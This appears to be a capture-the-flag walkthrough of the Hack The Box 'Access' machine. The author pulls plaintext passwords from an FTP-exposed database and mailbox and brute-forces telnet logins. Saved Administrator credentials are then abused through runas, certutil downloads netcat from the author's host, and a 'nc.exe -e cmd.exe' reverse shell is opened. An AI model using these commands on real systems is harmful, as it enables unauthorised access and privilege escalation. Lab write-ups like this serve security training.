Access
Wed, 02 October 2024
Platform: Hack The Box
sudo nmap 10.10.10.98 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.10.98
Host is up (0.020s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.49 seconds
ftp anonymous@10.10.10.98
Connected to 10.10.10.98.
Remote system type is Windows_NT.
ftp> ls
08-23-18 09:16PM <DIR> Backups
08-24-18 10:00PM <DIR> Engineer
ftp> cd Backups
ftp> ls
08-23-18 09:16PM 5652480 backup.mdb
ftp> cd Engineer
ftp> ls
08-24-18 01:16AM 10870 Access Control.zip
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
22% |***************** | 1258 KiB 1.22 MiB/s 00:03 ETAf
ftp: Reading from network: Interrupted system call
0% | | -1 0.00 KiB/s --:-- ETA
WARNING! 613 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
ftp> passive
ftp> binary
ftp> get backup.mdb ftp/backup.mdb
local: ftp/backup.mdb remote: backup.mdb
100% |******************************************************************************| 5520 KiB 1.33 MiB/s 00:00 ETA
5652480 bytes received in 00:04 (1.32 MiB/s)
ftp> passive
ftp> binary
ftp> get Access\ Control.zip ftp/accesscontrol.zip
local: ftp/accesscontrol.zip remote: Access Control.zip
100% |******************************************************************************| 10870 56.42 KiB/s 00:00 ETA
10870 bytes received in 00:00 (50.91 KiB/s)
mdb-tables backup.mdb -1 | sort -u > mdbtables.list
ACGroup
ACTimeZones
ACUnlockComb
AUTHDEVICE
AlarmLog
AttParam
AuditedExc
BioTemplate
CHECKEXACT
CHECKINOUT
CustomReport
DEPARTMENTS
DeptUsedSchs
EXCNOTES
EmOpLog
FaceTemp
FaceTempEx
FingerVein
FingerVeinEx
HOLIDAYS
LeaveClass
LeaveClass1
LossCard
Machines
NUM_RUN
NUM_RUN_DEIL
OfflinePermitDoors
OfflinePermitGroups
OfflinePermitUsers
ParamSet
ReportField
ReportItem
SECURITYDETAILS
SHIFT
STD_WiegandFmt
SchClass
ServerLog
SystemLog
TBKEY
TBSMSALLOT
TBSMSINFO
TEMPLATE
TEMPLATEEx
TmpPermitDoors
TmpPermitGroups
TmpPermitUsers
USERINFO
USER_OF_RUN
USER_SPEDAY
USER_TEMP_SCH
UserACMachines
UserACPrivilege
UserUpdates
UserUsedSClasses
UsersMachines
ZKAttendanceMonthStatistics
acc_antiback
acc_auxiliary
acc_door
acc_firstopen
acc_firstopen_emp
acc_holidays
acc_interlock
acc_levelset
acc_levelset_door_group
acc_levelset_emp
acc_linkageio
acc_map
acc_mapdoorpos
acc_monitor_log
acc_morecardempgroup
acc_morecardgroup
acc_morecardset
acc_reader
acc_timeseg
acc_wiegandfmt
acholiday
action_log
areaadmin
att_attreport
att_waitforprocessdata
attcalclog
attexception
auth_group
auth_group_permissions
auth_message
auth_permission
auth_user
auth_user_groups
auth_user_user_permissions
base_additiondata
base_appoption
base_basecode
base_datatranslation
base_operatortemplate
base_option
base_personaloption
base_strresource
base_strtranslation
base_systemoption
dbapp_viewmodel
dbbackuplog
deptadmin
devcmds
devcmds_bak
devlog
django_content_type
django_session
empitemdefine
iclock_dstime
iclock_oplog
iclock_testdata
iclock_testdata_admin_area
iclock_testdata_admin_dept
operatecmds
personnel_area
personnel_cardtype
personnel_empchange
personnel_issuecard
personnel_leavelog
userinfo_attarea
worktable_groupmsg
worktable_instantmsg
worktable_msgtype
worktable_usrmsg
while IFS= read -r t; do
mdb-json backup.mdb "$t" > "$t.json"
done < mdbtables.list
ls
ACGroup.json TmpPermitGroups.json auth_user.json
ACTimeZones.json TmpPermitUsers.json auth_user_groups.json
ACUnlockComb.json USERINFO.json auth_user_user_permissions.json
AUTHDEVICE.json USER_OF_RUN.json backup.mdb
AlarmLog.json USER_SPEDAY.json base_additiondata.json
AttParam.json USER_TEMP_SCH.json base_appoption.json
AuditedExc.json UserACMachines.json base_basecode.json
BioTemplate.json UserACPrivilege.json base_datatranslation.json
CHECKEXACT.json UserUpdates.json base_operatortemplate.json
CHECKINOUT.json UserUsedSClasses.json base_option.json
CustomReport.json UsersMachines.json base_personaloption.json
DEPARTMENTS.json ZKAttendanceMonthStatistics.json base_strresource.json
DeptUsedSchs.json acc_antiback.json base_strtranslation.json
EXCNOTES.json acc_auxiliary.json base_systemoption.json
EmOpLog.json acc_door.json dbapp_viewmodel.json
FaceTemp.json acc_firstopen.json dbbackuplog.json
FaceTempEx.json acc_firstopen_emp.json deptadmin.json
FingerVein.json acc_holidays.json devcmds.json
FingerVeinEx.json acc_interlock.json devcmds_bak.json
HOLIDAYS.json acc_levelset.json devlog.json
LeaveClass.json acc_levelset_door_group.json django_content_type.json
LeaveClass1.json acc_levelset_emp.json django_session.json
LossCard.json acc_linkageio.json empitemdefine.json
Machines.json acc_map.json ftptree.py
NUM_RUN.json acc_mapdoorpos.json iclock_dstime.json
NUM_RUN_DEIL.json acc_monitor_log.json iclock_oplog.json
OfflinePermitDoors.json acc_morecardempgroup.json iclock_testdata.json
OfflinePermitGroups.json acc_morecardgroup.json iclock_testdata_admin_area.json
OfflinePermitUsers.json acc_morecardset.json iclock_testdata_admin_dept.json
ParamSet.json acc_reader.json lol.csv
ReportField.json acc_timeseg.json lol.json
ReportItem.json acc_wiegandfmt.json mdbtables.list
SECURITYDETAILS.json accesscontrol.zip mdbtables.list.json
SHIFT.json acholiday.json operatecmds.json
STD_WiegandFmt.json action_log.json personnel_area.json
SchClass.json areaadmin.json personnel_cardtype.json
SystemLog.json att_waitforprocessdata.json personnel_issuecard.json
TBKEY.json attcalclog.json personnel_leavelog.json
TBSMSALLOT.json attexception.json userinfo_attarea.json
TBSMSINFO.json auth_group.json worktable_groupmsg.json
TEMPLATE.json auth_group_permissions.json worktable_instantmsg.json
TEMPLATEEx.json auth_message.json worktable_msgtype.json
TmpPermitDoors.json auth_permission.json worktable_usrmsg.json
cat *.json | grep -i 'passw'
{"id":25,"username":"admin","password":"admin","Status":1,"last_login":"08/23/18 21:11:47","RoleID":26}
{"id":27,"username":"engineer","password":"access4u@security","Status":1,"last_login":"08/23/18 21:13:36","RoleID":26}
{"id":28,"username":"backup_admin","password":"admin","Status":1,"last_login":"08/23/18 21:14:02","RoleID":26}
admin:admin
engineer:access4u@security
backup_admin:admin
7z x accesscontrol.zip -p'access4u@security' -o'accesscontrol'
7-Zip 24.08 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-08-11
64-bit locale=C.UTF-8 Threads:8 OPEN_MAX:1024
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: accesscontrol.zip
--
Path = accesscontrol.zip
Type = zip
Physical Size = 10870
Everything is Ok
Size: 271360
Compressed: 10870
file Access\ Control.pst
Access Control.pst: Microsoft Outlook Personal Storage (>=2003, Unicode, version 23), dwReserved1=0x234, dwReserved2=0x22f3a, bidUnused=0000000000000000, dwUnique=0x39, 271360 bytes, bCryptMethod=1, CRC32 0x744a1e2e
readpst Access\ Control.pst
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
ls
'Access Control.mbox' 'Access Control.pst'
cat Access\ Control.mbox
From "john@megacorp.com" Fri Aug 24 00:44:07 2018
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
security:4Cc3ssC0ntr0ller
cat usernames
engineer
backup_admin
admin
security
john
cat passwords
admin
access4u@security
4Cc3ssC0ntr0ller
nmap 10.10.10.98 -p 23 --script telnet-brute \
--script-args userdb=usernames,passdb=passwords
PORT STATE SERVICE
23/tcp open telnet
| telnet-brute:
| Accounts:
| security:4Cc3ssC0ntr0ller - Valid credentials
|_ Statistics: Performed 24 guesses in 17 seconds, average tps: 1.4
Nmap done: 1 IP address (1 host up) scanned in 21.26 seconds
telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
C:\Users>tree /F
Folder PATH listing
Volume serial number is 8164-DB5F
C:.
Administrator
Public
Documents
Downloads
Music
Sample Music
Pictures
Sample Pictures
Videos
Sample Videos
security
.yawcam
banlist.dat
pass.dat
ver.dat
yawcam_settings.xml
2
banlist.dat
pass.dat
ver.dat
yawcam_settings.xml
extravars
README.txt
{temperature}.txt
img
logs
info.txt
motion
stream
favicon.ico
README.txt
template_js.html
template_mjpg.html
template_wm.html
img
back.jpg
banned.jpg
bg.gif
datalimit.jpg
kicked.jpg
loading.jpg
mrk.gif
offline.jpg
pass.jpg
timelimit.jpg
toomany.jpg
tmp
Readme.txt
www
favicon.ico
index.html
update.html
wap.xhtml
extravars
README.txt
{temperature}.txt
img
logs
info.txt
motion
stream
favicon.ico
README.txt
template_js.html
template_mjpg.html
template_wm.html
img
back.jpg
banned.jpg
bg.gif
datalimit.jpg
kicked.jpg
loading.jpg
mrk.gif
offline.jpg
pass.jpg
timelimit.jpg
toomany.jpg
tmp
Readme.txt
www
favicon.ico
index.html
update.html
wap.xhtml
Contacts
Desktop
user.txt
Documents
Downloads
Favorites
Links
Suggested Sites.url
Web Slice Gallery.url
Microsoft Websites
IE Add-on site.url
IE site on Microsoft.com.url
Microsoft At Home.url
Microsoft At Work.url
Microsoft Store.url
MSN Websites
MSN Autos.url
MSN Entertainment.url
MSN Money.url
MSN Sports.url
MSN.url
MSNBC News.url
Windows Live
Get Windows Live.url
Windows Live Gallery.url
Windows Live Mail.url
Windows Live Spaces.url
Links
Desktop.lnk
Downloads.lnk
RecentPlaces.lnk
Music
Pictures
Saved Games
Searches
Videos
C:\Users\security\Desktop>type user.txt
13264509f5333c2ce144a11d50e45dcb
C:\Users>tree %public%/desktop /f
Folder PATH listing
Volume serial number is 8164-DB5F
C:\USERS\PUBLIC\DESKTOP
ZKAccess3.5 Security System.lnk
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
LF@ 7#P/PO :+00/C:\R1M:Windows:M:*wWindowsV1MVSystem32:MV*System32X2P:
runas.exe:1:1*Yrunas.exeL-KEC:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%
...C:\Windows\System32\runas.exe...
.../user:ACCESS\Administrator /savecred...
C:\Users\security>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
C:\Users\security>net user Administrator
User name Administrator
Full Name
Comment Built-in account for administering the computer/domain
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/21/2018 10:01:12 PM
Password expires Never
Password changeable 8/21/2018 10:01:12 PM
Password required No...
FILENAME=nc.exe && cp "$FILENAME" /tmp/ && python3 -m http.server -d /tmp 8088
powershell -c "certutil -urlcache -f http://10.10.16.7:8088/nc.exe nc.exe"
10.10.10.98 - - [02/Oct/2024 01:13:30] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.98 - - [02/Oct/2024 01:13:30] "GET /nc.exe HTTP/1.1" 200 -
C:\Users\security>runas /user:Administrator /savecred "nc.exe -e cmd.exe 10.10.16.7 4435"
Connection received on 10.10.10.98 49183
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
access\administrator
C:\Windows\system32>type C:\users\administrator\desktop\root.txt
b5f43372554f616079063b440b5d206b